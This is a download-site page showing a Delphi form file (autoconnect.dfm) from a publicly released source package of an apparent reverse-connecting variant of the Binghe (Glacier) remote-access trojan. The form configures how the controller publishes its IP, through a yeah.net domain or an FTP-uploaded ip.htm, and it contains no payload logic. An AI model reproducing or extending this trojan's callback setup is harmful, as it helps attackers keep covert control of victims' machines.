⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 autoconnect.dfm

📁 冰河反弹版之独孤夕客专版 今天我决定把这个版本的冰河反弹版程序源码公布
💻 DFM
字号:
object AutoForm: TAutoForm
  Left = 231
  Top = 128
  AutoScroll = False
  BorderIcons = [biSystemMenu, biMinimize]
  Caption = #33258#21160#19978#32447#35774#32622
  ClientHeight = 324
  ClientWidth = 408
  Color = clBtnFace
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'MS Sans Serif'
  Font.Style = []
  OldCreateOrder = False
  Position = poScreenCenter
  OnShow = FormShow
  PixelsPerInch = 96
  TextHeight = 13
  object Panel1: TPanel
    Left = 0
    Top = 0
    Width = 408
    Height = 185
    Align = alTop
    TabOrder = 0
    object PageControl1: TPageControl
      Left = 1
      Top = 1
      Width = 406
      Height = 183
      ActivePage = TabSheet1
      Align = alClient
      Style = tsFlatButtons
      TabOrder = 0
      object TabSheet1: TTabSheet
        Caption = 'Yeah.net'#26356#26032'IP'
        object Label2: TLabel
          Left = 8
          Top = 38
          Width = 91
          Height = 13
          Caption = #22495#21517#32593#22336#65306'http://'
        end
        object Label3: TLabel
          Left = 48
          Top = 78
          Width = 60
          Height = 13
          Caption = #29992#25143#23494#30721#65306
        end
        object UserEdit: TEdit
          Left = 120
          Top = 32
          Width = 105
          Height = 21
          TabOrder = 0
          Text = 'duguxike'
        end
        object ComboBox2: TComboBox
          Left = 232
          Top = 32
          Width = 89
          Height = 21
          ItemHeight = 13
          TabOrder = 1
          Text = '.yeah.net'
          Items.Strings = (
            '.yeah.net')
        end
        object PassEdit: TEdit
          Left = 120
          Top = 72
          Width = 209
          Height = 21
          PasswordChar = '*'
          TabOrder = 2
        end
      end
      object TabSheet2: TTabSheet
        Caption = 'FTP'#26356#26032'IP'
        ImageIndex = 1
        object Label4: TLabel
          Left = 8
          Top = 14
          Width = 80
          Height = 13
          Caption = 'FTP'#26381#21153#21487#22120#65306
        end
        object Label5: TLabel
          Left = 264
          Top = 16
          Width = 36
          Height = 13
          Caption = #31471#21475#65306
        end
        object Label6: TLabel
          Left = 11
          Top = 52
          Width = 72
          Height = 13
          Caption = #30331#24405#29992#25143#21517#65306
        end
        object Label7: TLabel
          Left = 224
          Top = 56
          Width = 36
          Height = 13
          Caption = #23494#30721#65306
        end
        object Label8: TLabel
          Left = 2
          Top = 86
          Width = 82
          Height = 13
          Caption = #23384#25918'IP'#30340#25991#20214#65306
        end
        object Label9: TLabel
          Left = 8
          Top = 120
          Width = 80
          Height = 13
          Caption = 'Http'#35775#38382#22320#22336#65306
        end
        object FtpEdit: TEdit
          Left = 96
          Top = 8
          Width = 129
          Height = 21
          TabOrder = 0
          Text = '61.188.xxx.xxx'
        end
        object PortEdit: TEdit
          Left = 312
          Top = 8
          Width = 65
          Height = 21
          TabOrder = 1
          Text = '21'
        end
        object FtpUserEdit: TEdit
          Left = 96
          Top = 48
          Width = 113
          Height = 21
          TabOrder = 2
          Text = 'duguxike'
        end
        object FtpPassEdit: TEdit
          Left = 272
          Top = 48
          Width = 105
          Height = 21
          PasswordChar = '*'
          TabOrder = 3
          Text = 'duguxike'
        end
        object FtpSipEdit: TEdit
          Left = 96
          Top = 80
          Width = 281
          Height = 21
          TabOrder = 4
          Text = 'www\ip.htm'
        end
        object HttpEdit: TEdit
          Left = 96
          Top = 120
          Width = 209
          Height = 21
          TabOrder = 5
          Text = 'http://www.xxx.com/ip.htm'
        end
        object Button2: TButton
          Left = 320
          Top = 118
          Width = 75
          Height = 25
          Caption = #35775#38382
          TabOrder = 6
          OnClick = Button2Click
        end
      end
    end
  end
  object Panel2: TPanel
    Left = 0
    Top = 185
    Width = 408
    Height = 139
    Align = alBottom
    TabOrder = 1
    object Label1: TLabel
      Left = 48
      Top = 104
      Width = 70
      Height = 13
      Caption = #26412#22320'IP'#22320#22336#65306
    end
    object Memo1: TMemo
      Left = 1
      Top = 1
      Width = 406
      Height = 81
      Align = alTop
      ScrollBars = ssVertical
      TabOrder = 0
    end
    object ComboBox1: TComboBox
      Left = 128
      Top = 100
      Width = 129
      Height = 21
      ItemHeight = 13
      TabOrder = 1
      Text = '127.0.0.1'
    end
    object Button1: TButton
      Left = 288
      Top = 96
      Width = 75
      Height = 25
      Caption = #26356#26032
      Default = True
      TabOrder = 2
      OnClick = Button1Click
    end
  end
  object IdHTTP1: TIdHTTP
    MaxLineAction = maException
    ReadTimeout = 0
    AllowCookies = True
    ProxyParams.BasicAuthentication = False
    ProxyParams.ProxyPort = 0
    Request.ContentLength = -1
    Request.ContentRangeEnd = 0
    Request.ContentRangeStart = 0
    Request.ContentType = 'text/html'
    Request.Accept = 'text/html, */*'
    Request.BasicAuthentication = False
    Request.UserAgent = 'Mozilla/3.0 (compatible; Indy Library)'
    HTTPOptions = [hoForceEncodeParams]
    Left = 168
    Top = 160
  end
  object IdAntiFreeze1: TIdAntiFreeze
    Left = 216
    Top = 160
  end
  object IdFTP1: TIdFTP
    MaxLineAction = maException
    ReadTimeout = 0
    ProxySettings.ProxyType = fpcmNone
    ProxySettings.Port = 0
    Left = 264
    Top = 144
  end
end

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -